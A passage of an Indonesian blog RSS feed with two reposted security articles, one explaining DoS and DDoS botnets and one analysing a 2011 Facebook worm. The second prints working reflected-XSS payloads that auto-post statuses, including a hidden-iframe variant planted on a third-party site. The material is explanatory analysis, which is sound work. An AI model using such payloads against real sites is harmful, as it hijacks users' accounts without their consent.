<p>Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket  yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.</p>
<p><strong>Make Server Busy Without Exploiting Vulnerability</strong></p>
<p>Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.</p>
<p>Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).</p>
<p>Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.</p>
<p>&nbsp;</p>
<div id="attachment_1569">
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/10/ddos.jpg"><img title="ddos" src="http://www.ilmuhacking.com/wp-content/uploads/2009/10/ddos.jpg" alt="DDoS Botnet Attack" width="570" height="255" /></a></li>
</ul>
<p>Courtesy of: www.dos-attack.net</p>
</div>
<p>Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).</p>
<p>Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.</p>
<p><strong>Kesimpulan</strong></p>
<p>Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:</p>
<ul>
<li>Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.</li>
<li>Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
<ul>
<li>Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.</li>
<li>Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.</li>
</ul>
</li>
</ul>
<p><em>source: http://www.ilmuhacking.com/web-security/memahami-serangan-denial-of-service/</em></p>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/348/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/348/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/348/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/348/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/348/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/348/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/348/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/348/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/348/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/348/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/348/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/348/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/348/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/348/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=348&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/memahami-serangan-denial-of-service/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/10/ddos.jpg" medium="image">
			<media:title type="html">ddos</media:title>
		</media:content>
	</item>
		<item>
		<title>Memahami Teknik Penyebaran Status Berantai di Facebook</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/memahami-teknik-penyebaran-status-berantai-di-facebook/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/memahami-teknik-penyebaran-status-berantai-di-facebook/#comments</comments>
		<pubDate>Mon, 13 Jun 2011 18:11:06 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=346</guid>
		<description><![CDATA[Teknik penyebaran status berantai di FaceBook : Analisa Mari kita mulai analisa kita dengan mengambil sample satu URL jebakan, yaitu tinyurl.com/sampahh. Ini adalah url versi pendek yang bila diklik akan melakukan redirect ke url aslinya, yaitu: http://m.facebook.com/connect/prompt_feed.php?display=wap&#38;user_message_prompt='&#60;script&#62;window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang http://tinyurl.com/sampahh';document.forms[0].submit();}&#60;/script&#62; URL tersebut akan saya pecah menjadi 3 bagian: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=346&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Teknik penyebaran status berantai di FaceBook :<br />
<strong>Analisa</strong></p>
<p>Mari kita mulai analisa kita dengan mengambil sample satu URL jebakan, yaitu tinyurl.com/sampahh. Ini adalah url versi pendek yang bila diklik akan melakukan redirect ke url aslinya, yaitu:</p>
<div>
<div>
<pre>http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt='&lt;script&gt;window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  http://tinyurl.com/sampahh';document.forms[0].submit();}&lt;/script&gt;</pre>
</div>
</div>
<p>URL tersebut akan saya pecah menjadi 3 bagian:</p>
<ul>
<li>
<div>
<div>
<pre>http://m.facebook.com/connect/prompt_feed.php</pre>
</div>
</div>
</li>
<li>
<div>
<div>
<pre>?display=wap&amp;user_message_prompt=</pre>
</div>
</div>
</li>
<li>
<div>
<div>
<pre>'&lt;script&gt;window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  http://tinyurl.com/sampahh';document.forms[0].submit();}&lt;/script&gt;</pre>
</div>
</div>
</li>
</ul>
<p>Bagian pertama adalah URL untuk update status. Bagian kedua adalah query string parameter yang terdiri dari dua parameter, yaitu display dan user_message_prompt. Bagian ketiga adalah isi dari parameter user_message_prompt yang merupakan payload javascript untuk mengubah status secara otomatis.</p>
<p><strong>The Prompt</strong></p>
<p>Sebelum masuk lebih jauh membahas payloadnya, mari kita lihat dulu bentuk tampilan dari URL untuk mengubah status ini. Gambar ini adalah screenshot ketika browser membuka URL:</p>
<div>
<div>
<pre>http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt=Masukkan Status</pre>
</div>
</div>
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss2.jpg"><img title="fbxss2" src="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss2.jpg" alt="" width="508" height="343" /></a></li>
</ul>
<p>Dari gambar di atas kini kita memahami fungsi dari parameter user_message_prompt, yaitu sebagai judul pertanyaan/prompt. Agar user mengerti apa yang harus diinputkan, dalam setiap prompt harus diberi judul yang jelas, contohnya: “Input your PIN”, “Enter your Name”, “Password:” dan sebagainya. Silakan anda mencoba bermain-main dengan mengubah-ubah nilai user_message_prompt sesuka anda di address bar dan perhatikan apa yang terjadi.</p>
<p><strong>Reflected Cross Site Scripting</strong></p>
<p>Normalnya user_message_prompt diisi dengan murni teks saja berupa instruksi/petunjuk apa yang harus diinputkan user. Bila parameter user_message_prompt berisi teks murni saja, maka tidak ada yang perlu dikhawatirkan, namun bagaimana bila parameter tersebut diisi dengan kode HTML atau javascript?</p>
<p>Perhatikan apa yang terjadi bila user_message_prompt diisi dengan kode HTML:</p>
<div>
<div>
<pre>&lt;font color=red&gt;&lt;h1&gt;Hello!!&lt;/h1&gt;&lt;/font&gt;</pre>
</div>
</div>
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss3.jpg"><img title="fbxss3" src="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss3.jpg" alt="" width="590" height="365" /></a></li>
</ul>
<p>Perhatikan juga apa yang terjadi bila user_message_prompt diisi dengan kode HTML:</p>
<div>
<div>
<pre>&lt;img src="http://1.bp.blogspot.com/_D2J2A4A68T8/TH80zGbHcYI/AAAAAAAAAIw/RXaLXYldrWw/s320/Hacked.jpg"/&gt;</pre>
</div>
</div>
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss4.jpg"><img title="fbxss4" src="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss4.jpg" alt="" width="617" height="645" /></a></li>
</ul>
<p>Bagaimana bila user_message_prompt tidak hanya diisi dengan kode HTML, tapi diisi dengan kode javascript? Mari kita coba memasukkan javascript sederhana berikut ini:</p>
<div>
<div>
<pre>&lt;script&gt;prompt("Enter your PIN");&lt;/script&gt;</pre>
</div>
</div>
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss5.jpg"><img title="fbxss5" src="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss5.jpg" alt="" width="694" height="458" /></a></li>
</ul>
<p>Kita sudah melihat bagaimana user_message_prompt tidak hanya bisa diisi dengan normal teks, namun juga bisa diisi dengan kode HTML dan javascript yang dieksekusi browser. Ini adalah vulnerability yang disebut dengan XSS (Cross Site Scripting), lebih tepatnya reflected-XSS (karena kode yang diinjeksikan dalam URL “dipantulkan” kembali sebagai response HTTP).</p>
<p><strong>The Payload</strong></p>
<p>Dalam contoh sebelumnya kita mencoba memasukkan javascript sederhana yang hanya menampilkan prompt input kepada user. Sebenarnya javascript bisa dipakai untuk melakukan hampir apa saja mulai dari yang sekedar iseng seperti mengubah status, sampai yang serius seperti seperti mencuri cookie korban atau take-over komputer korban dengan mengeksploitasi kelemahan pada browsernya. Hal-hal inilah yang disebut dengan payload. Attacker bebas memasukkan payload apa saja yang dia inginkan seperti mengubah status, mencuri cookie dsb.</p>
<p>Perhatikan kembali isi parameter user_message_prompt yang didapat dari tinyurl.com/sampahh:</p>
<div>
<div>
<pre>user_message_prompt='&lt;script&gt;window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  http://tinyurl.com/sampahh';document.forms[0].submit();}&lt;/script&gt;</pre>
</div>
</div>
<p>Bagi pembaca yang jeli tentu merasa aneh, kenapa ada karakter single-quote (‘) sebelum tag script? Perlukah karakter single-quote ini? Jawabannya adalah tidak perlu sama sekali. Saya melihat semua yang membuat url sejenis ini dalam payloadnya selalu ada karakter single-quote di depan tag script. Mungkin pembuatnya hanya ikut-ikutan saja tanpa benar-benar mengerti apa yang terjadi, karena dia mencontoh orang lain memakai single-quote, maka diapun ikut memakai single-quote.</p>
<p>Payload untuk mengubah status sebenarnya sangat sederhana. Berikut ini adalah payload untuk mengubah status di facebook secara otomatis:</p>
<p><a href="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss7.jpg"><img title="fbxss7" src="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss7.jpg" alt="" width="377" height="64" /></a></p>
<p>Onload adalah event yang terjadi bila suatu halaman web selesai di-load. Baris pertama pada kode di atas artinya meminta browser untuk mengeksekusi sebuah fungsi secara otomatis ketika halaman ini selesai diload. Fungsi yang dimaksud terdiri dari dua baris kode sederhana untuk mengubah nilai textarea message dan melakukan submit form.</p>
<p>Baris kedua dimaksudkan untuk mengubah nilai dari textarea bernama message seperti gambar di bawah ini.</p>
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss8.jpg"><img title="fbxss8" src="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss8.jpg" alt="" width="324" height="210" /></a></li>
</ul>
<p>Langkah terakhir adalah memanggil fungsi submit() untuk melakukan submit form. Jadi sangat sederhana cara untuk mengubah status secara otomatis, cukup dua langkah saja, mengisi message dengan isi status, lalu submit, status pun selesai diubah.</p>
<p><strong>Varian Lain dengan IFRAME</strong></p>
<p>Saya juga menemukan varian lain yang memakai iframe. Varian ini lebih berbahaya karena bisa disisipkan dalam web apapun dan bisa dengan mudah melakukan pengubahan status berulang kali. Salah satu teman facebook saya menjadi korban freesmsvoip.com sampai berkali-kali.</p>
<ul>
<li><a href="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss9.jpg"><img title="fbxss9" src="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss9.jpg" alt="" width="606" height="668" /></a></li>
</ul>
<p>Kenapa bisa kena sampai berkali-kali? Mari kita lihat potongan awal source html dari www.freesmsvoip.com.</p>
<div>
<div>
<pre>&lt;iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt='&lt;script&gt;window.onload=function(){document.forms[0].message.value='Kirim SMS Gratis Ke Semua Operator di www.freesmsvoip.com Wow.. cool guys! coba gihhh!!!';document.forms[0].submit();}&lt;/script&gt;"&gt;&lt;/iframe&gt;
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /&gt;
&lt;title&gt;SMS Gratis Semua Operator - Kirim SMS Gratis Via Internet - SMS Gratis Online - Widget SMS Gratis&lt;/title&gt;
&lt;meta name="description" content="Kirim SMS gratis ke semua operator GSM, CDMA se-Indonesia tanpa bayar lewat internet" /&gt;</pre>
</div>
</div>
<p>Perhatikan pada baris pertama ada tag iframe dengan src yang juga mengeksploitasi XSS vulnerability pada m.facebook.com/connect/prompt_feed.php. Tag iframe ini tidak hanya ada pada halaman depan saja, namun pada setiap halaman di web tersebut. Akibatnya bila pengunjung hanya melihat halaman depan saja, dia hanya kena satu kali, bila dia juga berkunjung ke halaman-halaman lain, maka dia akan melakukan update status berkali-kali.</p>
<p>Berbeda dengan kasus yang memakai jasa pemendek url seperti tinyurl.com, serangan memakai iframe bisa dilekatkan pada halaman web yang tampak normal, baik hati dan tidak sombong. Dengan maraknya kasus eksploitasi XSS dengan url-shortener, orang akan semakin curiga bila menerima link yang dipendekkan karena user tidak tahu url itu akan dibelokkan ke mana. Menerima url yang dipendekkan kini mirip dengan menerima paket yang tidak jelas apa isinya, buku atau bom. Namun berbeda kasusnya dengan url yang panjang, orang cenderung tidak curiga bila menerima url panjang, apalagi domainnya tampak seperti situs baik-baik.</p>
<p>&nbsp;</p>
<p><em>source: http://www.ilmuhacking.com/web-security/memahami-teknik-penyebaran-status-berantai-di-facebook/</em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/346/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/346/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/346/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/346/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/346/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/346/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/346/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/346/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/346/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/346/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/346/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/346/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/346/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/346/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=346&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/memahami-teknik-penyebaran-status-berantai-di-facebook/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss2.jpg" medium="image">
			<media:title type="html">fbxss2</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss3.jpg" medium="image">
			<media:title type="html">fbxss3</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss4.jpg" medium="image">
			<media:title type="html">fbxss4</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss5.jpg" medium="image">
			<media:title type="html">fbxss5</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss7.jpg" medium="image">
			<media:title type="html">fbxss7</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss8.jpg" medium="image">
			<media:title type="html">fbxss8</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2011/03/fbxss9.jpg" medium="image">
			<media:title type="html">fbxss9</media:title>
		</media:content>
	</item>
	</channel>
</rss>
